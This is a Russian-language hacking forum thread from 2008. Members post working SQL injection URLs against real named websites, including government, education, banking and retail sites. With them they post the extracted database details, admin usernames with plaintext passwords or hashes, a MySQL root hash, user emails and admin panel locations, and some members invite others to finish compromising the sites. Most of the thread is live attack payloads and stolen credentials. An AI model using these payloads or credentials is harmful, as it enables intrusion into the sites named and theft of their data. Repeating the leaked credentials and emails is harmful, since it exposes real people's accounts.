community:4dfedf012cc6837d
zzt:0e5829ac32cde319
john_doe:70520cc9573c1cd3 phpAds:58efd1e0451c7a6c
-------------------------------------------------
http://www.kiirus.ee/php/index.php?lang=rus&id=-6+union+select+1,pass_admin,3,4,5,6+from+admin
http://www.kiirus.ee/php/index.php?lang=rus&id=-6+union+select+1,pass_admin,3,4,5,6+from+admin
логин/пасс:
Need4speed08:d2357411549940e64b552c99e78a1035
--------------------------------------------------
The End!

spherics

24.11.2008, 01:06

http://www.marotori.com/news.php?id=2+union+select+1,2,3,4,5,6--

Довольно нехилое портфолио у них в общем понравилось мне там.

Database Version: 5.0.67-log
Database name: marotor_site
User name: marotor_dbuser@web0.marotori.net

In database marotor_apa_datafeed found table datafeed_authentication
0 : id
1 : auth_username
2 : auth_password
3 : auth_ip
4 : enable
5 : currency_id

[1]:11:approvedie:gogo123:91.186.19.1691.186.19.12990 .207.170.23983.136.71.11590.207.70.121:1:3
[2]:12:approveduk:gogo123:91.186.19.1691.186.19.12990 .207.170.23983.136.71.11577.44.50.42:1:1
[3]:13:telegraph:letmeinnow:91.186.19.1690.152.10.148 91.186.19.12981.157.123.20891.109.166.13591.186.19 .28:1:1
[4]:14:readersdigest:gogo123:91.186.19.1691.186.19.12 9:1:1
[5]:15:approvedgolf:gogo123:91.186.19.1691.186.19.129 :1:1
[6]:16:sandersonyoung:gogo123:91.186.19.1691.186.19.1 29:1:1

Я так понял пароли открыты но вот че то дальше не смог.
Может не там копался помогите...

Тут админка если че. http://www.marotori.com/admin/

Pashkela

24.11.2008, 19:34

Может кто захочет доковырять до конца, мне лень:)

1) 4.1.11-Debian_4sarge2

http://www.drumshop.co.uk/product.php?id=99999/**/union/**/select/**/1,22,23,24,unhex(hex(version())),26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52--

2) 5.0.45-community-nt

http://www.streetendfeeds.co.uk/productdetails.php?id=789789789789%20UNION%20SELEC T%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23--

Ламоза

24.11.2008, 20:36

Смотрим в заголовок 4.1.11-Debian_4sarge7
http://briefing.defenceandindustry.gov.au/category.php?id=-8+union+select+1,2,aes_decrypt(aes_encrypt(version (),0x71),0x71),4,5,6,7,8,9,10,11,12,13/*

Швейцарские горлопаны в австралии :)
http://www.swiss.org.au/member.php?ID=-20+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25/*
4.1.21-standard-log, таблица members есть, дальше не копал.

plutus

24.11.2008, 21:37

http://hotelsaustri adirect.com/index.php?mod=re_search&ad=-7+union+select+1,2,3,4,concat(username,0x3e,passwo rd),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23+from+websiteadmin_admin_users--

faza02

24.11.2008, 21:41

http://ukrgazeta.plus.org.ua/article.php?ida=-594+union+select+1,2,3,4,5,6,7,8,9,10/*
user(): u_plus@localhost
database(): plus
version(): 4.1.22

//можете поздравить, у мну завтро днюхо!))

spherics

24.11.2008, 23:09

http://www.fo-ra.ru/news.php?id=2 +union+select+1,version(),user(),database()--
5.0.67-log
u152033@10.10.223.228
u152033_fora

//faza02 с днюхой тебя хех,а у меня через 3 дня -)

FNS

25.11.2008, 00:02

https://www.shoparooni.com/plushform/item.php?id=2/**/and/**/1=0/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32/**/from/**/PHPAUCTIONXL_adminusers--
marlee:d89da8338e706977fc6c5902abac3ebe
Админки не нашел.

Fugitif

25.11.2008, 00:35

http://www.indwesgear.com/item.php?id=-1%20UNION%20SELECT%201,2,concat_ws(0x3a,version(), database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17/*
5.0.38-Ubuntu_0ubuntu1.4-log:caps:root@localhost

FNS

25.11.2008, 03:07

http://www.booking-all.com/order.php?id=-2+union+select+concat(admin_name,0x3a,admin_pass)+ from+admin--
http://www.booking-all.com/admin/
adminline:dge25ak519540

ThreeD

25.11.2008, 05:22

http://www.imperialtouch.com/page.php?id=-25+union+select+1,2,concat_ws(0x3A3a,version(),dat abase())/*

4.0.27-max-log::itadmin
________________________

;) ;) ;)

http://www.ciaovillas.com/city_vacation_rentals.php?id=76&list=58&state=-39+union+select+concat_ws(0x3A3a,version(),databas e())--

5.0.68-log::Sql139072_1

tromlen

25.11.2008, 11:12

Код:
https://www.shoparooni.com/plushform/item.php?id=2/**/and/**/1=0/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32/**/from/**/PHPAUCTIONXL_adminusers--

Цитата:marlee:d89da8338e706977fc6c5902abac3e be

Админки не нашел.

то FNS robots.txt смотрел ?

crystalbit

25.11.2008, 17:26

http://www.gfi.su/index_text_and_img.php?idt=841&categ_id=34&men_id=7&langid=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

http://www.gfi.su/index_text_and_img.php?idt=841&categ_id=34&men_id=7&langid=-1+union+select+1,2,3,4,5,6,7,concat(memberName,':' ,passwd),9,10+from+gfi_forum.smf_members+limit+0,1/*

тИЦ 325, PR 4

version: 5.1.22-rc-log
database: gfi_su
user: gfi@localhost

XaCeRoC

25.11.2008, 18:39

http://www.grenadegloves.com/news.php?id=-1+union+all+select+1,2,3,concat(email,0x3a,passwor d),5,6,7,8,9+from+users--
..

XaCeRoC

25.11.2008, 18:49

http://buysellusa.net/classifieds/showCat.php?cat_id=-99999/**/union/**/select/**/0,concat(user_name,0x3a,password),2/**/from/**/std_users/*
..

crystalbit

25.11.2008, 18:51

http://www.reichert-reisen.ru/ru/ost.php?idt=-1+union+select+1,version(),3,4,database(),6,user() ,8,9--
единственная найденная мною таблица - news
4.1.21-log
reichert_base
reichert_user@localhost

crystalbit

25.11.2008, 20:04

http://tmxxi.ru/podholod.php?idt=-1+union+select+1,2,3/*
Database Version: 4.1.12
Database name: tmxxi
User name: tmxxi@localhost
..
http://tehbasa.ru/index.php?idt=-1+union+select+1,2,3,4,5,6,7/*
Database Version: 4.1.22-log
Database name: wwwtehbasaru_asid
User name: tehbasa_asid@79.174.73.72

plutus

25.11.2008, 21:57

http://file-ma iler.com/faq_man/catagorie.php?cat_id=-1+union+select+1,2,3,concat_ws(0x3a,admin_name,adm in_pass),5+from+faq_admin--

oka:d13f0c63fc5bfb88b9aca27d1888551d

ThreeD

26.11.2008, 12:49

Shop. Вроде как диджейское оборудование и иже с ними.

http://www.spectrumaudio.com/manprods.php?id=-69+union+select+1,concat_ws(0x3A3a,database(),vers ion()),3,4--

spect9_spectrumaudio::5.0.51a-community

Дампим. Есть цэцэ кому интересно в таблице ордерс, они хешированы. Есть админские данные, админку не нашёл (или не искал?)) Не интересно.

http://www.spectrumaudio.com/phpinfo.php

crystalbit

26.11.2008, 22:45

http://www.beltechautosnab.by/index.php?i_id=-542+union+select+1,concat_ws(0x3a,session_id,produ ct_id,product_name,product_price,product_quantity, product_sum),3+from+shcart+limit+1,1/*
Database Version: 5.0.32-Debian_7etch6-log
Database name: beltech
User name: res-K_beltech@localhost

докрутил до конца, ничего интересного для себя не нашел

j0ker13

26.11.2008, 23:40

присоединяюсь потихоньку))
http://cupick64.com/img.php?iid=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6+from+admin_data--

банально admin:admin

админка: http://cupick64.com/admin/

sabe

27.11.2008, 08:04

Unique.com - pr 5
Ubcmedia.com
http://www.ubcmedia.com/pressview.php?ID=-185+union+select+1,2,concat_ws(0x3a,uname,pword),4 ,5+from+users+limit+0,1/*
/admin/login.php

Yo.ru - pr 3
http://yo.ru/element.php?element_id=-130+union+select+1,2,3,version(),5--&id=832
5 ветка..

Frame.ru - pr 3
http://frame.ru/sqlmodel.php?index=-664+union+select+1,2,3,version(),5/*
4 ветка..

Pro-check.com.au - pr 3
http://www.pro-check.com.au/testimonial_details.php?testimonial_id=67+union+se lect+1,2,version(),4,5,6--
4 ветка..

Occasio.com.au - pr 3
http://www.occasio.com.au/news_details.php?news_id=18+union+select+1,2,versi on(),4,5,6--
4 ветка..

Neotec.com.ua - pr 4
http://www.neotec.com.ua/phps/index2.php?go=catalog&id=46+and+substring(version(),1,1)=3
3 ветка..

http://www.wimsbios.com/linkscategory.jsp?category=BIOS')+union+select+1,2 ,concat_ws(0x3a,username,user_password)+from+phpbb 2_users%23
http://lolbot.ru/files/?c=1&s=2%20and%20(select%20ascii(substr(table_name,1,1) )%20from%20(select%20*%20from%20(select%20*%20from %20information_schema.tables%20where%20table_schem a=0x76736373%20order%20by%20table_schema%20limit%2 01,1)%20t%20order%20by%20table_schema%20desc)t%20l imit%201)%3E100%20and%201=1
если кто сможет что зделать))

ThreeD

27.11.2008, 11:12

http://www.swe-system.com/product.php?id=-29'+union+select+1,concat_ws(0x3A3a,version(),data base()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

5.0.22::swesyste_store
--------------------------------------
http://www.nooz.co.nz/list.php?category=7'+union+select+1,2,concat_ws(0x 3A3a,id,email,password),4,5,6,7,8,9,10,11,12,13,14 ,15,16,17+from+members--%20

5.0.51a-0.dotdeb.1-log
--------------------------------------
http://www.fireplaceswholesale.net/product_detail.php?ID=-107+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25/*

5.0.45-community-nt

$n@ke

27.11.2008, 13:35

Региональные GOV колумбии
http://www.planetariodebogota.gov.co/ninos/answer.php?id=1297+order+by+999--
User: planetar_bduser@localhost
Dbname: planetar_principal
Version: 5.0.67-community-log

tbladmin -->> admin:planeta_2005
хз где админко

http://www.redehospitalbaq.gov.co/ver_noticia.php?id=-265+UNION+SELECT+1,usuario,3,pass,5,6,7,8,9+FROM+u suarios+limit+0,100/*

Dbname: redehospitalbaq_gov_co_-_redehospital
Version: 5.0.45
User: redehco2@localhost

admin:admin

хз где логиница) не особо и искал.

ThreeD

27.11.2008, 19:21

http://www.overstockpro.com/item.php?id=-13'+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14/*

5.0.45-log

j0ker13

27.11.2008, 20:08

http://www.unique.co.uk/pressview.php?ID=-1+union+select+1,2,concat_ws(0x3a,uname,pword),4,5 +from+users--

admin:b83dea104b4e116367c8477fc9b8740a
http://www.unique.co.uk/admin/

http://myths.nen.gov.uk/about/view.php?id=308'
http://myths.nen.gov.uk/about/view.php?id=-1+union+select+1,2,3,4,5,version(),7,concat_ws(0x3 a,admin_username,admin_password),9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57+from+ml_users/*
dianeearl 1645ee78de0f7c73001e1a8ed1facc25a72b6796
huw 8ec6e1bb3914e917c06bfb3360f80a356b9a0bda
taras@gooii.com 46a48023ce31b1677c08d0dc72c05ad0da588bc4
story ca0dd83451c629db7ee96129d150ee1750a05ba2
annafenn 7e0eb0f86e23d12ed64b47ef4024614d4ff635a8

Ламоза

27.11.2008, 21:15

В антибояне маловато японских доменов, теперь я понял почему, в япононет больше ни ногой.

4.0.27
http://www.kawaguchiko.gr.jp/show_detail.php?id=-20+union+select+1,2,3,4,5,version(),7,user(),datab ase(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57, 58,59,60,61,62,63,64,65/*

4.1.22
http://www.safetyweb.co.jp/business_detail.php?id=-7+union+select+version()/*

4.1.20
http://www.eufilmdays.jp/en/film.php?id=-18+union+select+version(),2,3,4,5,6,7,8,9,10,11,da tabase(),13,14,15,16,17,18,19,20/*
Есть таблица films с полями name и time, больше ничего не нашёл.

FNS

27.11.2008, 21:47

http://www.ohiomagicshop.com/storeit.php?id=-5+union+select+1,version(),3,4,5,6,7,8,9--
4.1.22-standard-log

Calcutta

27.11.2008, 22:05

http://www.bend-fsbo.com/index.php?go=detail&id=99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0,0,email,concat(юзернэ� �м,0x3a,пассворд),1,1,1,1,1,1,2,2,2,2,2/**/from/**/адмын/**/limit/**/0,2--

на хосте таких сайтов много еще (-

plutus

27.11.2008, 23:55

http://www.spokanejo urnal.com/index.php?id=article&sub=-2710+union+select+1,2,version(),4,5,6,7,8,9,10,11, 12,13,14,15--&keyword=

4.0.24

faza02

28.11.2008, 00:19

http://www.michaeloddo.com/googlestore/storeit.php?id=19+union+select+1,2,3,4,5,6,7,8,9--

version(): 4.1.22-standard-log
user(): magimik_magimike@74.50.88.2
database(): magimik_shop

http://www.pakwatan.com/business_detail.php?id=-4724+union+select+1,2,3,4,5,6,7,8,9,10--

version(): 5.0.67-community
user(): pakweb_ahmad@localhost
database(): pakweb_pakwatan

http://www.theyorkdirectory.com/business_detail.php?id=4+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29/*

http://springhillchamber.com/business_detail.php?id=-283+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35--

version(): 5.0.67-community-log
user(): springh5_5hc0com@localhost
database(): springh5_5Hchamber

plutus

28.11.2008, 00:36

http://www.digitalch arity.com/m.php?id=-41260+union+select+1,2,3,4,5,6,concat_ws(0x3a,emai l,paypal,passwd),8,9,10,11,12,13+from+beg_users+li mit+700,1--

plutus

28.11.2008, 01:29

http://www.123prop ertynews.com/magazinearticle.php?id=-559+union+select+1,2,3,4,5,version(),7,8,9,10,11--

4.0.20-log

plutus

28.11.2008, 01:40

http://www.dknews.kz/newslink.php?id=-28+union+select+1,version(),3,4,5,6--

4.1.22-standard

plutus

28.11.2008, 02:16

http://www.gladwi sh.ae/en/news_details.php?id=-42+union+select+1,concat_ws(0x3a,pass,username,pos ition),3,4,5,6,7+from+login_secured--

plutus

28.11.2008, 02:20

FIRST CARIBEAN INTERNATIONAL BANK
http://www.firstcaribbe anbank.an/?node=page&id=15'

http://www.central bank.an/publications_statistics.php?sub=21&id=501'

plutus

28.11.2008, 02:24

http://www.language-affairs.com.ar/index.php?o=detallep&id=-13+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15--

4.1.21-standard

plutus

28.11.2008, 02:52

http://www.hire-int elligence.com.au/content.php?id=-18+union+select+1,concat_ws(0x3a,username,password ,firstname,lastname,permissions),3,4,5,6,7,8,9+fro m+hi_admin+limit+0,1--

plutus

28.11.2008, 04:01

http://adultbloghu b.com/sitesummary.php?id=-19+union+select+1,2,concat_ws(0x3a,user_login,0x3a ,user_pass,0x3a,user_nicename,0x3a,user_email,0x3a ,display_name),4,5,6,7,8+from+as_users--

http://www.dymn m.com/mboard/write.html?table=board&id=-120+union+select+1,2,3,4,concat_ws(0x3a,multi_id,0 x3a,multi_password,0x3a,multi_skin_name),6,7,8+fro m+multi_admin--&mode=reply

http://www.dirtyfinde r.com/go.php?id=-3307+union+select+1,2,3,version()--
4.1.21 -standart

j0ker13

28.11.2008, 17:21

http://www.unique.co.uk/pressview.php?ID=44
http://www.unique.co.uk/pressview.php?ID=-1+union+select+1,2,concat_ws(0x3a,uname,pword),4,5 +from+users--

admin:b83dea104b4e116367c8477fc9b8740a

plutus

28.11.2008, 18:15

http://www.mapsoft.co.yu/dev/comersus/database/comersus.mdb [база]

http://www.cyprushotelsdirect.com/info.php?hotelid=-159+union+select+version()--&showtab=overview
4.1.22-standard

http://bonjourvoyage.com/critik/review.php?hotelID=-1014+union+select+1,2,3,4,table_name,6,7,8,9+from+ information_schema.tables--
5.0.32-Debian_7etch1-log
не было времени раскрутить.

Dobby007

28.11.2008, 18:28

megamaika.kz - магазин.
http://www.megamaika.kz/index.php?content_id=5+UNI_ON+SELECT+1,CON_CAT(0x3 C623E44617461626173653A3C2F623E20,Database(),0x3C6 2723E3C623E557365726E616D653A3C2F623E20,User(),0x3 C62723E3C623E56657273696F6E3A3C2F423E20,Version()) ,3+LIMIT+1,1/*
Database: megamaik_megamaika
Username: megamaik_root@localhost
Version: 4.1.21-standard

З.Ы. Если кто раскрутит инъекцию дальше, буду только рад. Только просьба выложить сюда. А то сами понимаете - молодой еще, только учусь =)... Может чего-то и не учитываю :) НО там, насколько я понял, привелигии просто урезаны.

aikyn.kz - партия чтоли какая-та. так и не понял =)
http://www.aikyn.kz/site.php?lan=kaz&id=166&pub=21940+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,CON CAT(0x3C623E44617461626173653A3C2F623E20,Database( ),0x3C62723E3C623E557365726E616D653A3C2F623E20,Use r(),0x3C62723E3C623E56657273696F6E3A3C2F423E20,Ver sion(),0x3C62723E3C623E446174613A3C2F623E20,table_ name)+from%20information_schema.tables+LIMIT+18,1/*

Ну здесь уже по-больше можно сделать. Хотя б к information_schema доступ имеется.

Database: aikyn
Username: aikyn@localhost
Version: 5.0.45-community-nt

Вот таблицы все:
banners
gallery
modules
news_kaz
noc
notes
poll_kaz
pub_kaz
str_kaz
themes

faza02

29.11.2008, 00:34

http://www.ubcmedia.com/pressview.php?ID=-101+union+select+1,2,3,4,5/*
4.1.20

http://www.uniquebroadcasting.com/pressview.php?ID=-15+union+select+1,2,3,4,5/*
4.1.20

http://www.unique.co.uk/pressview.php?ID=-155+union+select+1,2,3,4,5/*
4.1.20

http://www.barnabasventures.com/pressview.php?ID=-64+union+select+1,2,3,4,5,6,7/*

http://www.ubcmediagroup.com/pressview.php?ID=-166+union+select+1,2,3,4,5/*
4.1.20

ыы)) один и тот же сайт))

//jOker13, ку)

plutus

29.11.2008, 03:26

http://www.ks e.com.sd/show_item_ar.php?id=-7+union+select+1,2,version(),4--&t=0

5.0.51a-community-log :)

http://www.attorn eys.si/index.php?page=archive&F=D&ID=-106+union+select+1,2,version(),4,5,6--
5.0.45 :)

http://press.keppelland.com.sg/article.asp?id=-384+union+select+1,2,3,4,5,version(),7--&q=4&y=2001
4.0.21-debug-log

Dimi4

29.11.2008, 11:58

http://favicon.yandex.net/favicon/karabin.com.ua/ karabin.com.ua

http://www.karabin.com.ua/statlq.php?c_i=-250+union+select+1,2--

Database Version: 5.0.22-standard
Database name: karabin_db1
User name: karabin_db1@localhost

http://www.karabin.com.ua/statlq.php?c_i=-250+union+select+name,password+from+auth_members--

Geen 9a60736ac38bb969ae574715a665fa69 (1230456789)

http://favicon.yandex.net/favicon/naprokat.com.ua/ naprokat.com.ua (213.186.116.231)
Database Version: 5.0.22-standard
Database name: karabin_db7
User name: karabin_npr@localhost

http://naprokat.com.ua/board.php?parr=-6+union+select+1--

ThreeD

29.11.2008, 12:09

www.hym.com.au

http://www.hym.com.au/product-detail.php?id=-71+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17/*

4.1.25-Debian_mt1

geezer.code

29.11.2008, 13:35

Оптечко
http://www.lahisam.uz/?lang=ru&id=09814%27+union+select+1,concat_ws(0x3a,lgn,psw, status),3,4,5+from+users+limit+0,1/*
admin:fenixz:adm

Shaitan-Devil

29.11.2008, 16:20

http://rcnit.kz/index.php?p=-32+union+select+1,concat_ws(0x3a,id,login,pwd),3,4 ,5,6,7,8+from+rcnit_kz.auth--

admin:279634
Форум

Administrator:e6e62645328f659db3ffbd82cd537fa1;
8830b3439a6c7870f32087802997a82a;

ThreeD

29.11.2008, 16:23

Буржуйский хостинг

www.spoonohost.com

http://www.spoonohost.com/about/news.php?id=22+union+select+1,concat_ws(0x3A3a,use r(),version(),database()),3,4,5/*

User::sphost_sphost@localhost
Version::4.1.22-standard-log
Database::sphost_main

Ponchik

29.11.2008, 22:08

gta.com.ua
http://gta.com.ua/news_details.phtml?news_id=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,VERSION(),US ER(),DATABASE())--
5.0.51a-community:gtacom_gta@localhost:gtacom_gta

..::TROYAN::..

30.11.2008, 02:50

http://imei.org.ua/search.php?imei=-1+union+select+1,concat(user(),0x3a3a,database(),0 x3a3a,version()),3,4,5,6,7,8/*
slava@localhost::imei::4.1.21-log
http://imei.org.ua/search.php?imei=-1+union+select+1,concat(host,0x3a3a,user,0x3a3a,pa ssword,0x3a3a,file_priv),3,4,5,6,7,8+from+mysql.us er+limit+0,1/*
localhost::root::*2679BA488B8CF696590C7C1D51804387 761ECA94::Y

p.s load_file() работает,вот только неполучилось прочитать конфиг=//

faza02

30.11.2008, 05:39

http://www.peopleandplanet.net/section.php?section=-3+union+select+1,2,3,4,5/*
5.0.27-standard

Iceangel_

30.11.2008, 07:14

исключительно .edu...

http://review.antioch.edu/detail.php?id=815+union+select+1,2,version(),4,5,6 ,7--
4.1.22-log
---------------------------------------------------------------------

http://www.choices.edu/resources/detail.php?id=-192+union+select+1,unhex(hex(version())),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28--
4.1.14-log
--------------------------------------------------------------------

Department of Nuclear Physics
http://wwwrsphysse.anu.edu.au/nuclear/group.php?id=-6+union+select+1,version(),3,4,5,6--
5.0.45
--------------------------------------------------------------------

http://www.antioch-college.edu/news/releases/newsitem.php?id=63+union+select+1,2,3,version(),5, 6,7,8--
5.0.51a-community
laslas:laslas не помню, откуда то вытащил ;)
--------------------------------------------------------------------

http://www.uta.edu/ee/news/newsitem.php?id=-31+union+select+1,version(),3,4,5,6,7,8,9,10,11--
5.0.45-log
--------------------------------------------------------------------

http://www.westkentucky.kctcs.edu/newsitem.php?ID=83+union+select+1,2,version(),4,5, 6--
4.1.22-standard

Ламоза

30.11.2008, 23:33

Сегодня Канада
----------------------
5.0.41
http://www.loginstitute.ca/moreinfo.php?id=-8+union+select+1,2,load_file(0x2f7573722f6c6f63616 c2f7777772f6c6f67696e737469747574652f61646d696e2f7 0656e64696e672e70687033),4,5,6,7/*
захексено /usr/local/www/loginstitute/admin/pending.php3 - какая то левая админка :)

5.0.45-log
http://www.cfsontario.ca/english/campaigns.php?id=-20+union+select+1,2,3,concat_ws(0x40,table_schema, table_name),5,6,7,8,9,10,11,12,13,14,15+from+infor mation_schema.tables/*

4.0.16-standard
http://www.gcc.ca/archive/article.php?id=-31+union+select+version(),2,3,4,5,6/*

4.1.14-log
http://www.vancouver-ecodensity.ca/content.php?id=-42+union+select+1,2,unhex(hex(concat_ws(0x40,id,us ername,password))),4,5,6,7,8,9,10,11,12,13,14,15,1 6+from+members/*

И чуть чуть Австралии
4.1.21-log
http://www.australbrick.com.au/national/news_item.php?ID=-31794+union+select+version(),2,3/*

BanQui

01.12.2008, 03:44

http://www.orizon-navigation.com/index.php?page=407&lang=1&id=-8+union+select+1,2,3,4,5,6,7,pass,9,name,11,12,13+ from+orizon_db1.admin+limit+1,1--

Админка

http://orizon-navigation.com/admin/index.php

Ток что пооимел сайт)) От сердца отрываю)) Учитесь нубы подбирать поля и таблицы у 4ый версий!!!

BanQui

01.12.2008, 03:56

http://www.velogearance.com/index.php?page=2&action=1&ride=-21+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15-- - Сопсно крутите сами! Версия самая легкая:
5.0.51a-log

Удачи! Время 3 часа ночи что-то глаза закрываются))

plutus

01.12.2008, 05:12

http://www.visu algap.co.uk/index.php?page=show_artist_info&id=-4+union+select+1,2,3,4,concat_ws(0x3a,id,0x3a,ip,0 x3a,country,0x3a,referer),6,7,8,9,10+from+site_log--

spherics

01.12.2008, 05:47

Онлайн игры.
В общем довольно много пользователей в таблице users свыше 7 тысяч.

http://www.fallenswordguide.com/realms/detail.php?id=-5+union+select+version()/*

Database Version: 5.0.27
Database name: fallen_db
User name: fallen_guide@localhost

Table [users]
userid
username
password
level
email
reg_date
style

http://www.gothaguide.com/realms/detail.php?id=-124+union+select+version()/*

Database Version: 5.0.27
Database name: gothagui_db
User name: gothagui_db@localhost

spherics

01.12.2008, 05:52

Магазинчик деталей на велосипеды хех. www.zipp.com

http://www.zipp.com/wheels/detail.php?ID=- 5+union+select+1,2,3,4,5,version(),user(),8,9,10,1 1,12,13,14,15,16,17,18,19,20,21/*

Database Version: 5.0.45
Database name: Zipp
User name: zipp@localhost

bons

01.12.2008, 11:09

www.softstandart.com, тИЦ = 10

http://www.softstandart.com/feedback.php?id=-1%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+0
http://www.softstandart.com/?ks_cat=9999%27+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29--+0

вторая инъекция - вывод всех записей

version() - 5.0.67-log
database() - softstandart
user() - james303@galaxie.dreamhost.com

здесь вероятно логин и хэш админа:
http://www.softstandart.com/?ks_cat=9999%27+union+select+1,2,3,4,concat(id,':' ,login,':',pass),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29+from+user--+0

интуиция говорит мне что он быстро подбирается и подходит к админке: http://www.softstandart.com/admin
-----------------------------

www.bfpais.ru, тИЦ = 10

http://www.bfpais.ru/index.php3?id=6191&nid=-1+union+select+1,2,3,concat(version(),0x3A,user(), 0x3A,database()),5,6,7,8,9--

version() - 5.0.67
user() - bfpais@localhost
database() - bfpais

http://www.bfpais.ru/index.php3?id=6191&nid=-1+union+select+1,2,3,4,5,6,concat(id,0x3A,nick,0x3 A,passwd,0x3A,access),8,9+from+_user+limit+0,1--

как мне кажется, есть большая вероятность что здесь пароль вообще даже не хэширован и подходит к админке: http://www.bfpais.ru/admin
-----------------------------

www.infoliolib.info, тИЦ = 160

http://www.infoliolib.info/author.php?aid=-1+union+select+1,concat(version(),0x3A,user(),0x3A ,database()),3--

version() - 5.0.51a-community
user() - infoli_user@localhost
database() - infoli_infolio
-----------------------------

www.studentam.by

http://www.studentam.by/index.php?m=6&cl=l&mn=1&id=-1+union+select+version(),database(),user()--

version() - 5.0.51a-6-log
database() - studentamby
user() - studentamby@localhost